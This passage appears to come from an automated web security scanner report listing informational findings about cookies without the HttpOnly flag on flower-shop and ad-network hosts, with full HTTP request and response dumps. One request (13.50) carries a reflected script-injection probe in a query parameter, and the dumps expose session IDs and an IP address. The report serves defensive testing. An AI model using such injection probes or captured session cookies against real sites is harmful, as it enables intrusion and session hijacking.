Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1185=2931142961646634775; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1; 
rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%265970%3D1; expires=Wed, 08-Jun-2011 01:02:40 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C%265970%3D11825%2C0%2C1%2C14%2C; expires=Wed, 08-Jun-2011 01:02:40 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.49. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

13.50. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

13.51. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

13.52. http://recs.richrelevance.com/rrserver/p13n_generated.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rrserver/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304902956346&p=%7C91637&cts=http%3A%2F%2Fww30.1800flowers.com&pt=%7Ccart_page.bottom&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800flowers.com%2Fproduct.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pendprch=b73.1303848210023.%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D.24512906%7C; uc=525826ce-e29a-4f38-4315-024be4d0c771; catvhc=d-eF0-g9tZ-B---%%; vihc=b82.1304902911700.59433447%7C; pvihc=b82.1304902911700.59433447%7C73.1303848202747.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:13:07 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: pendprch=b82.1304903587088.null.59433447%7C; Expires=Sat, 27-May-2079 04:27:14 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 21686

var rr_recs={placements:[{used:false,placementType:'cart_page.bottom',html:'<div class="rr_main" id="rrRecs"><div class="rr_strategy">People Who Viewed "Fields of Europe&trade; for Spring" Also Viewe
...[SNIP]...

13.53. http://recs.richrelevance.com/rrserver/p13n_generated.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rrserver/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304902894374&cn=Spring&c=10305&cts=http%3A%2F%2Fww30.1800flowers.com&pt=%7Ccategory_page.content&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800flowers.com%2Fcollection.do%3Fdataset%3D10305&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pvihc=b73.1303848202747.21158348%7C; pendprch=b73.1303848210023.%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D.24512906%7C; uc=525826ce-e29a-4f38-4315-024be4d0c771

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:06:52 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: catvhc=d-eF0-g9tZ-B---%%; Expires=Sat, 27-May-2079 04:20:59 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 25372

var rr_recs={placements:[{used:false,placementType:'category_page.content',html:'<div class="rr_main" id="rrRecs"><div class="rr_strategy">Sitewide Top Sellers</div><div class="rr_recborder"><div cla
...[SNIP]...

13.54. http://recs.richrelevance.com/rrserver/p13n_generated.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rrserver/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304902910725&cs=%7C10305%3ASpring&p=91637&re=Y&cts=http%3A%2F%2Fww30.1800flowers.com&pt=%7Citem_page.right&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800flowers.com%2Fcollection.do%3Fdataset%3D10305&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pvihc=b73.1303848202747.21158348%7C; pendprch=b73.1303848210023.%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D.24512906%7C; uc=525826ce-e29a-4f38-4315-024be4d0c771; catvhc=d-eF0-g9tZ-B---%%

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:08:26 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b82.1304903306071.59433447%7C; Path=/
Set-Cookie: pvihc=b82.1304903306071.59433447%7C73.1303848202747.21158348%7C; Expires=Thu, 06-May-2021 01:08:26 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 11724

var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="rr_main_vert" id="rrRecs"><div class="rr_strategy_vert">People Who Viewed This Item Ultimately Bought</div><div
...[SNIP]...

13.55. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=39804&partnerID=91&clientID=4744&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; 
segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJND15BrQSKBAOAD4/P74="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 01:02:39 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 01:02:19 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8b9woJV/tjEJrH/yDGglUIADAEVAP+s="; Domain=invitemedia.com; expires=Tue, 08-May-2012 01:02:39 GMT; Path=/
Content-Length: 344

makePixelRequest("http://ad.yieldmanager.com/pixel?id=1095653&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script sr
...[SNIP]...

13.56. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s82534269827883

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/proflodevelopment/1/H.22.1/s82534269827883?AQB=1&ndh=1&t=9%2F4%2F2011%207%3A8%3A20%201%20300&ns=proflowers1&pageName=PFC%3Ahome%3Ahome&g=http%3A%2F%2Fwww.proflowers.com%2F&cc=USD&ch=PFC%3Ahome&server=PRVD36&c1=PFC%3Ahome%3AHPC&c2=5%3A00AM&c3=Monday&v4=PFC&c5=na%3Ana%3Ana%3Ana&v5=HPC&v7=27&c11=PFC&c12=true&v12=pfb0%3Apku1%3Apkv2%3Apml0%3Apfl0%3A%3A%3Apfe3%3Apec3%3Apem1%3Apmm2%3A%3A%3A%3Appr2%3Axpa1%3Apsr2%3Aapg1%3A&c13=false&c14=true&v22=5%3A00AM&v23=Monday&c28=91621bab-4967-45f8-ad8e-98be730e6e4a&v31=-1&c35=CUS&v35=empty%20code&v39=pvo2%3A%3A%3A%3Apnp3%3Apxa2%3Apxb1%3Apxc1%3A%3A%3Apks3%3Apkt1%3Azzd2%3Azze1%3Aphl2%3Aphr2%3Azzf2%3Axpc1%3A&v49=%3A%3A%3A%3A%3Apbo5%3A%3Appv3%3A%3Anta1%3Antb1%3Antc1%3Antd2%3Ante2%3Apmt3%3A%3Axpb1%3Aprh1%3A&v50=PFC%3AUSA&v52=PFC&c53=D%3Dv53&v53=homepage001&c54=D%3Dv54&v54=pfc_control_050811&c55=D%3Dv55&v55=PFC%3Ahome%3Ahomepage%3Apfc_control_2011-05-07&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
